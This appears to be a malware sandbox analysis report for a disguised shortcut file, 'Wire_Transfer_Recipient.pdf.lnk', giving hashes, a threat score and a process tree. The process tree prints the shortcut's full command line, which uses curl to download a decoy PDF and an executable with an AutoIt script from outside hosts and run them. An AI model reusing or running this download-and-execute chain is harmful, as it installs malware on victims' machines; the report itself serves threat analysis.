Analysis
-
max time kernel
119s -
max time network
122s -
platform
windows7_x64 -
resource
win7-20231020-en -
resource tags
-
submitted
20-11-2023 16:57
General
-
Target
Wire_Transfer_Recipient.pdf.lnk
-
Size
1KB
-
MD5
65333dee897813812caf650a2c6997c7
-
SHA1
8eda0e9a054f635152c3cf1af9f01c01e925157d
-
SHA256
2aa219e648895ec611aa69f1a484c8e58866aa5f4c0ba020a65443b819d20c25
-
SHA512
ce2ece91a46a9369de9730de5326e98c6479df7b7dcf6c7c7d2af600f9f25ee03ddf9a36cfdd9c47e985184c071d1a8558fdda9253ac566afbdd1aaf25b76d14
Score
3/10
Malware Config
Signatures
-
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Suspicious use of WriteProcessMemory 6 IoCs
Processes
-
C:\Windows\system32\cmd.execmd /c C:\Users\Admin\AppData\Local\Temp\Wire_Transfer_Recipient.pdf.lnk1⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\cmd.exe"C:\Windows\system32\cmd.exe" /c start /min /b && curl -s -o "C:\Users\Public\unsupported-version.pdf" http://screenshot.photos/unsupported-version.pdf && "C:\Users\Public\unsupported-version.pdf" && curl -s -o "C:\Users\Public\Seed.exe" http://45.154.98.21/Seed.exe && curl -s -o "C:\Users\Public\leaf.au3" http://45.154.98.21/leaf.au3 && "C:\Users\Public\Seed.exe" "C:\Users\Public\leaf.au3" && "C:\Users\Public\Seed.exe" "C:\Users\Public\leaf.au3" && "C:\Users\Public\Seed.exe" "C:\Users\Public\leaf.au3"2⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\cmd.execmd.exe3⤵
-
-